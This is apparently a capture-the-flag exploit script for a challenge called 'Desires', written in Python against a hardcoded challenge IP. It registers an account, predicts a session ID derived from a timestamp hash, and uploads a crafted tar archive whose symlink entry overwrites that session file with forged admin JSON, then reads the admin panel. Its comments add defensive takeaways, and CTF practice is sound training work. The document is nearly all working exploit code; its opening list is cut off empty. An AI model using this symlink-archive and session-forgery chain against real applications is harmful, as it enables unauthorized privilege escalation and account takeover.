🧠 Desires Exploit Script

This script demonstrates a multi-step exploit chain combining:

It results in admin privilege escalation and flag retrieval on the Desires CTF challenge.

import time
import hashlib
import requests
import tarfile
import io
import json
import uuid
import sys

# Challenge instance this script talks to (taken from the exercise; the
# host/port are ephemeral per CTF deployment).
base_url = "http://94.237.53.203:43527"
# One Session so cookies set by /register and /login persist across calls.
s = requests.Session()

# Fresh, random account so the run does not collide with earlier attempts.
username = "user_" + uuid.uuid4().hex[:8]
password = "password"
register_data = {"username": username, "password": password}
print(f"[*] Registering user: {username}")
# Registration is sent as a JSON body; note that login below uses a form
# body (data=) instead -- both forms are what the visible endpoints accept.
reg_resp = s.post(f"{base_url}/register", json=register_data)
if reg_resp.status_code != 200:
    print("[-] Registration failed"); sys.exit(1)

print("[*] Logging in post-registration...")
login_data = {"username": username, "password": password}
login_resp = s.post(f"{base_url}/login", data=login_data)
if login_resp.status_code != 200:
    print("[-] Login failed"); sys.exit(1)

# Only echoed for diagnostics; this cookie is replaced later.
session_cookie = s.cookies.get("session")
print(f"[+] Login successful, session: {session_cookie}")

# Weakness relied on here: the session identifier is assumed to be
# SHA-256 of the unix timestamp at which it is created, so it can be
# predicted ahead of time. The 3-second offset leaves room for the upload
# step below to finish first. Defensive takeaway: session ids must come
# from a CSPRNG (e.g. secrets.token_hex), never from a clock value.
target_timestamp = int(time.time()) + 3
session_id = hashlib.sha256(str(target_timestamp).encode()).hexdigest()
print("[*] Calculated session_id:", session_id)

# Build the archive: first a SYMTYPE entry named "link" pointing at the
# predicted session file, then a regular entry with the SAME name holding
# the forged session JSON. An extractor that unpacks entries in order and
# follows the already-created symlink writes the JSON through it (presumed
# server behaviour -- not visible here). Defensive takeaway: extract with
# tarfile's 'data' filter (PEP 706, tarfile.data_filter), which rejects
# links that escape the destination, or reject link entries outright.
archive_name = "malicious.tar"
payload_data = json.dumps({"username": username, "id": 3, "role": "admin"}, separators=(',', ':'))
try:
    with tarfile.open(archive_name, "w") as tar:
        symlink = tarfile.TarInfo("link")
        symlink.type = tarfile.SYMTYPE
        symlink.linkname = f"/tmp/sessions/{username}/{session_id}"
        tar.addfile(symlink)
        file_info = tarfile.TarInfo("link")
        # NOTE(review): size counts str characters, but the body written is
        # payload_data.encode(); they only agree because the payload is
        # pure ASCII (hex username, fixed keys).
        file_info.size = len(payload_data)
        tar.addfile(file_info, io.BytesIO(payload_data.encode()))
except Exception as e:
    # Broad catch is deliberate for a one-shot script: any archive error is fatal.
    print("[-] Error creating TAR archive:", str(e))
    sys.exit(1)

print("[*] Uploading archive...")
# The archive is written to the local working directory and is never
# removed by this script; it stays on disk after the run.
with open(archive_name, "rb") as f:
    files = {"archive": (archive_name, f, "application/x-tar")}
    upload_resp = s.post(f"{base_url}/user/upload", files=files)
    print("[*] Upload response:", upload_resp.status_code)

# Sleep until the predicted timestamp so that the server-side session
# created by the next request (presumably keyed on time.time()) matches
# session_id. If the upload took longer than 3 seconds the window is
# missed and the chain silently fails.
delay = target_timestamp - int(time.time())
if delay > 0: time.sleep(delay)
print("[*] Attempting login with wrong password to trigger session ID")
# Empty-password login: the script relies on the server still creating a
# session file for a failed login (inferred from the print above, not
# verifiable from this side).
s.post(f"{base_url}/login", data={"username": username, "password": ""})

# Present the predicted id as our session cookie and read the admin page;
# the response body is printed verbatim, which is where a flag would appear.
s.cookies.set("session", session_id)
admin_page = s.get(f"{base_url}/user/admin")
print("[*] Admin panel status:", admin_page.status_code)
print(admin_page.text)